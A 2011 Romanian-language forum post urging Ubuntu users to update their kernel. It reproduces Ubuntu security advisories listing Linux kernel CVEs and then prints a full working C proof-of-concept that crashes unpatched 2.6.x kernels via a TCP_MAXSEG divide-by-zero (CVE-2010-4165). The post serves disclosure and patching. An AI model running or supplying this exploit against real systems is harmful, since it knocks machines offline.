Flubber Posted March 2, 2011 Report Share Posted March 2, 2011 Deja s-a facut upgrade-ul la 2.6.32-29. Cine are Ubuntu, update && upgrade.[uSN-1080-1] Linux kernel vulnerabilities (Ubuntu 10.04 LTS)Details follow:Thomas Pollet discovered that the RDS network protocol did not checkcertain iovec buffers. A local attacker could exploit this to crash thesystem or possibly execute arbitrary code as the root user. (CVE-2010-3865)Vasiliy Kulikov discovered that the Linux kernel X.25 implementation didnot correctly clear kernel memory. A local attacker could exploit this toread kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)Vasiliy Kulikov discovered that the Linux kernel sockets implementation didnot properly initialize certain structures. A local attacker could exploitthis to read kernel stack memory, leading to a loss of privacy.(CVE-2010-3876)Vasiliy Kulikov discovered that the TIPC interface did not correctlyinitialize certain structures. A local attacker could exploit this to readkernel stack memory, leading to a loss of privacy. (CVE-2010-3877)Nelson Elhage discovered that the Linux kernel IPv4 implementation did notproperly audit certain bytecodes in netlink messages. A local attackercould exploit this to cause the kernel to hang, leading to a denial ofservice. (CVE-2010-3880)It was discovered that multithreaded exec did not handle CPU timerscorrectly. A local attacker could exploit this to crash the system, leadingto a denial of service. (CVE-2010-4248)Krishna Gudipati discovered that the bfa adapter driver did not correctlyinitialize certain structures. A local attacker could read files in /sys tocrash the system, leading to a denial of service. (CVE-2010-4343)Tavis Ormandy discovered that the install_special_mapping function couldbypass the mmap_min_addr restriction. A local attacker could exploit thisto mmap 4096 bytes below the mmap_min_addr area, possibly improving thechances of performing NULL pointer dereference attacks. (CVE-2010-4346)It was discovered that the ICMP stack did not correctly handle certainunreachable messages. If a remote attacker were able to acquire a socketlock, they could send specially crafted traffic that would crash thesystem, leading to a denial of service. (CVE-2010-4526)Dan Rosenberg discovered that the OSS subsystem did not handle nametermination correctly. A local attacker could exploit this crash the systemor gain root privileges. (CVE-2010-4527)Dan Carpenter discovered that the Infiniband driver did not correctlyhandle certain requests. A local user could exploit this to crash thesystem or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)[uSN-1081-1] Linux kernel vulnerabilities (Ubuntu 10.10)ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed. Ifyou use linux-restricted-modules, you have to update that package aswell to get modules which work with the new kernel version. Unless youmanually uninstalled the standard kernel metapackages (e.g. linux-generic,linux-server, linux-powerpc), a standard system upgrade will automaticallyperform this as well.Details follow:It was discovered that KVM did not correctly initialize certain CPUregisters. A local attacker could exploit this to crash the system, leadingto a denial of service. (CVE-2010-3698)Thomas Pollet discovered that the RDS network protocol did not checkcertain iovec buffers. A local attacker could exploit this to crash thesystem or possibly execute arbitrary code as the root user. (CVE-2010-3865)Vasiliy Kulikov discovered that the Linux kernel X.25 implementation didnot correctly clear kernel memory. A local attacker could exploit this toread kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)Vasiliy Kulikov discovered that the Linux kernel sockets implementation didnot properly initialize certain structures. A local attacker could exploitthis to read kernel stack memory, leading to a loss of privacy.(CVE-2010-3876)Vasiliy Kulikov discovered that the TIPC interface did not correctlyinitialize certain structures. A local attacker could exploit this to readkernel stack memory, leading to a loss of privacy. (CVE-2010-3877)Nelson Elhage discovered that the Linux kernel IPv4 implementation did notproperly audit certain bytecodes in netlink messages. A local attackercould exploit this to cause the kernel to hang, leading to a denial ofservice. (CVE-2010-3880)Dan Rosenberg discovered that the ivtv V4L driver did not correctlyinitialize certian structures. A local attacker could exploit this to readkernel stack memory, leading to a loss of privacy. (CVE-2010-4079)Dan Rosenberg discovered that the semctl syscall did not correctly clearkernel memory. A local attacker could exploit this to read kernel stackmemory, leading to a loss of privacy. (CVE-2010-4083)It was discovered that multithreaded exec did not handle CPU timerscorrectly. A local attacker could exploit this to crash the system, leadingto a denial of service. (CVE-2010-4248)Nelson Elhage discovered that Econet did not correctly handle AUN packetsover UDP. A local attacker could send specially crafted traffic to crashthe system, leading to a denial of service. (CVE-2010-4342)Tavis Ormandy discovered that the install_special_mapping function couldbypass the mmap_min_addr restriction. A local attacker could exploit thisto mmap 4096 bytes below the mmap_min_addr area, possibly improving thechances of performing NULL pointer dereference attacks. (CVE-2010-4346)Dan Rosenberg discovered that the OSS subsystem did not handle nametermination correctly. A local attacker could exploit this crash the systemor gain root privileges. (CVE-2010-4527)Dan Carpenter discovered that the Infiniband driver did not correctlyhandle certain requests. A local user could exploit this to crash thesystem or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)Cat despre Linux Kernel <= 2.6.37:/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165) * ======================================================= * A divide by 0 error occurs in tcp_select_initial_window * when processing user supplied TCP_MAXSEG facilitating a * local denial-of-service condition (kernel oops!) in all * Linux Kernel 2.6.x branch (2.6.37 & below). This issue * can be triggered easily with a call to setsockopt() on * a listening network socket and then establishing a TCP * connection to the awaiting socket. * * -- prdelka * */#include <stdio.h>#include <stdlib.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include <netinet/tcp.h>int main() { int optval, optlen, ret, sd, sd2, pid; char *host = "localhost"; struct sockaddr_in locAddr; struct sockaddr_in servAddr; struct sockaddr_in dstAddr; printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n"); sd = socket(AF_INET, SOCK_STREAM, 0); memset(&servAddr,0,sizeof(servAddr)); memset(&dstAddr,0,sizeof(dstAddr)); servAddr.sin_family = AF_INET; servAddr.sin_port = htons(60000); servAddr.sin_addr.s_addr = INADDR_ANY; dstAddr.sin_family = AF_INET; inet_aton("127.0.0.1", &dstAddr.sin_addr); dstAddr.sin_port = htons(60000); if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){ printf("[ Cannot bind listener service\n"); exit(-1); } listen(sd,4); optval = 12; ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval)); if(ret==0) { printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n"); int sin_size = sizeof(struct sockaddr_in); switch(pid = fork()) { case 0: sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size); sleep(3); default: sd2 = socket(AF_INET, SOCK_STREAM, 0); connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr)); sleep(3); } } printf("[ System is patched, no dreams for this prince\n"); return 0;}Surse (in ordine):1] Full Disclosure: [uSN-1080-1] Linux kernel vulnerabilities2] Full Disclosure: [uSN-1081-1] Linux kernel vulnerabilities3] Linux Kernel <= 2.6.37 Local Kernel Denial of Service Quote Link to comment Share on other sites More sharing options...